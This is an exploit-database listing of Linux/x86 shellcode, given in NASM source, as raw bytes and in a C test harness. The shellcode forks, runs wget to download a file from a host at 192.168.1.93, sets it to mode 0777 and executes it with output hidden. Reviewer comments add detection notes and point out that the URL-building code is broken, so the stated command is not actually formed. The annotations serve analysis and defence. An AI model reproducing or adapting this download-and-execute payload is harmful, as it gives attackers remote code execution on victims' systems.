
Linux/x86 - Chmod + Execute (/usr/bin/wget 192.168.1.93//x) Hide Output Shellcode (129 bytes)

🗓️ 30 Jun 2019 00:00:00 · Reported by lockedbyte · Type: zdt
🔗 0day.today👁 185 Views

Linux/x86 Chmod + Execute (/usr/bin/wget 192.168.1.93//x) Hide Output Shellcode (129 bytes)

Code
/**

; Shellcode 129 Bytes
; download (via wget) + chmod + execute shellcode + hide output
;      Exec: /usr/bin/wget http://192.168.1.93//x > /dev/null 2>&1
;

global _start

section .text

; ---------------------------------------------------------------------------
; _start -- parent path of the sample.
; Syntax/ABI: NASM, 32-bit Linux, int 0x80 (eax = syscall number,
;             ebx / ecx / edx = first three arguments).
;
; Flow visible in this block:
;   1. fork (eax = 2); the child (return value 0) jumps to `download`.
;   2. parent: syscall 7 (waitpid on i386), labelled wait(NULL) by the author.
;   3. parent: chmod("x", 0777)                  -- syscall 0xf, mode 0x1ff.
;   4. parent: execve("x", {"x", NULL}, {NULL})  -- syscall 11.
; "x" is a relative path, so steps 3 and 4 act on a file named x in the
; process's current working directory.
; No exit syscall follows step 4: if execve returns (i.e. fails), execution
; falls through into `download`.
;
; Detection notes: what is observable from outside is a process that forks,
; then issues chmod with mode 0777 and execve on the same relative file name.
; Process-lineage and syscall-audit telemetry for that sequence is a more
; durable signal than the address in the header comment, which is an RFC 1918
; private address (presumably the author's test network).
; ---------------------------------------------------------------------------
_start:

    ;fork
    xor eax,eax
    mov al,0x2                  ; eax = 2 (fork)
    int 0x80
    xor ebx,ebx
    cmp eax,ebx                 ; fork returns 0 in the child
    jz download                 ; child -> download path; parent continues below

    ; wait(NULL)
    ; eax = 7 is waitpid on i386. ebx is still 0 from the compare above;
    ; ecx and edx are not written anywhere in this listing before the call,
    ; so their values come from whatever ran before this code.
    xor eax,eax
    mov al,0x7
    int 0x80

    ; give execution permissions to the binary x
    xor ecx,ecx
    xor eax, eax
    push eax                    ; zero dword placed after the path on the stack
    mov al, 0xf                 ; eax = 15 (chmod)
    push 0x78                   ; "x" followed by three zero bytes
    mov ebx, esp                ; ebx -> "x" (relative path)
    xor ecx, ecx                ; repeats the clear done four instructions earlier
    mov cx, 0x1ff               ; mode 0x1ff = octal 0777 (rwx for user/group/other)
    int 0x80
    
    ; execution of binary x
    xor eax, eax
    push eax                    ; zero dword placed after the path
    push 0x78                   ; "x"
    mov ebx, esp                ; ebx -> "x" (filename)
    push eax                    ; NULL pointer: doubles as argv terminator
    mov edx, esp                ; edx -> that NULL, i.e. envp = {NULL}
    push ebx                    ; argv[0] = "x"
    mov ecx, esp                ; ecx -> argv = {"x", NULL}
    mov al, 11                  ; eax = 11 (execve)
    int 0x80
    
; ---------------------------------------------------------------------------
; download -- child path, reached when fork returned 0 (and by fall-through
; if the parent's execve returns).
; Author's stated intent (header comment): run /usr/bin/wget against
; 192.168.1.93//x with the output hidden.
;
; Registers at the final int 0x80, as the listing is written:
;   ebx -> "/usr/bin/wget"          (built from the four pushes below)
;   ecx -> { ebx, pointer to the argument string, NULL }
;   edx =  0                        (set by cdq)
;
; NOTE(review): the eight `mov eax, imm32` lines each overwrite eax and only
; one `push eax` follows, so only the last immediate ("192.") reaches the
; stack, and no later instruction writes eax before the int 0x80. The code as
; published therefore does not build the command line shown in the header;
; treat the header as the author's description when triaging, and rely on the
; instructions and bytes for what the sample does.
; ---------------------------------------------------------------------------
download:

    push 0xb
    pop eax                     ; eax = 11 (execve) at this point
    cdq                         ; edx = 0 (sign-extension of eax)
    push edx                    ; zero dword placed after the argument string
    ; download uri
    ; Immediates are stored little-endian; the author's comments show each
    ; one reversed, as it is written in the hex literal.
    mov eax, 0x31263e32 ; 1&>2 hide_output[4]   (bytes in memory: "2>&1")
    mov eax, 0x6c6c756e ; llun/  hide_output[3] (bytes in memory: "null")
    mov eax, 0x2f766564 ; ved  hide_output[2]   (bytes in memory: "dev/")
    mov eax, 0x2f3e20 ; />  hide_output[1]      (bytes in memory: " >/" + 0x00)
    mov eax, 0x782f2f ; x//  path[1]            (bytes in memory: "//x" + 0x00)
    mov eax, 0x33392e31 ;93.1 addr[3]           (bytes in memory: "1.93")
    mov eax, 0x2e383631 ;.861 addr[2]           (bytes in memory: "168.")
    mov eax, 0x2e323931 ;.291  addr[1]          (bytes in memory: "192.")
    push eax                    ; pushes only the value from the line above
    mov ecx,esp                 ; ecx -> the argument string on the stack
    push edx                    ; zero dword placed after the program path
    
    ; download execution in /usr/bin/wget
    
    push 0x74 ;t
    push 0x6567772f ;egw/
    push 0x6e69622f ;nib/
    push 0x7273752f ;rsu/
    mov ebx,esp                 ; ebx -> "/usr/bin/wget"
    push edx                    ; argv terminator (NULL)
    push ecx                    ; argv[1] = argument string
    push ebx                    ; argv[0] = "/usr/bin/wget"
    mov ecx,esp                 ; ecx -> argv
    int 0x80
    

**/

// nasm -felf32 wget.nasm -o wget.o
// ld -m elf_i386 wget.o -o wget

#include <stdio.h>
#include <string.h>

// gcc -z execstack -fno-stack-protector shellcode.c -o shellcode

// SHELLCODE 129 Bytes

// Assembled form of the NASM listing in the comment block above.
// Twelve rows of 10 bytes plus a final row of 9 give 129 bytes, matching the
// size stated on the page; the C string literal adds one trailing 0x00.
// The opening bytes 31 c0 b0 02 cd 80 are `xor eax,eax / mov al,2 / int 0x80`
// (the fork at _start), and each 0xb8 in rows 6-10 is a `mov eax, imm32`
// from the download section.
// buf is a non-const global array, so it is placed in writable data; it only
// runs as code if the page holding it is also executable. With NX / W^X
// enforced on that page, the call in main() faults instead of executing it.
char buf[] = "\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8"
"\x74\x2a\x31\xc0\xb0\x07\xcd\x80\x31\xc9"
"\x31\xc0\x50\xb0\x0f\x6a\x78\x89\xe3\x31"
"\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50"
"\x6a\x78\x89\xe3\x50\x89\xe2\x53\x89\xe1"
"\xb0\x0b\xcd\x80\x6a\x0b\x58\x99\x52\xb8"
"\x32\x3e\x26\x31\xb8\x6e\x75\x6c\x6c\xb8"
"\x64\x65\x76\x2f\xb8\x20\x3e\x2f\x00\xb8"
"\x2f\x2f\x78\x00\xb8\x31\x2e\x39\x33\xb8"
"\x31\x36\x38\x2e\xb8\x31\x39\x32\x2e\x50"
"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65"
"\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72"
"\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";


// Test harness: treats the bytes in buf as a function and calls it.
// argc and argv are accepted but not used.
// The build line on the page passes -z execstack (marks the binary as
// requesting an executable stack) and -fno-stack-protector (omits stack
// canaries), so the resulting binary is built with those two hardening
// defaults switched off.
// NOTE(review): `void main` is not a standard signature, and <stdio.h> and
// <string.h> are included but nothing from them is used in the code shown.
void main(int argc, char **argv)
{
        int (*func)();                  // pointer to a function returning int
        func = (int (*)()) buf;         // data-to-code cast: func now points at the byte array
        (int)(*func)();                 // transfers control into buf; the result is discarded
}
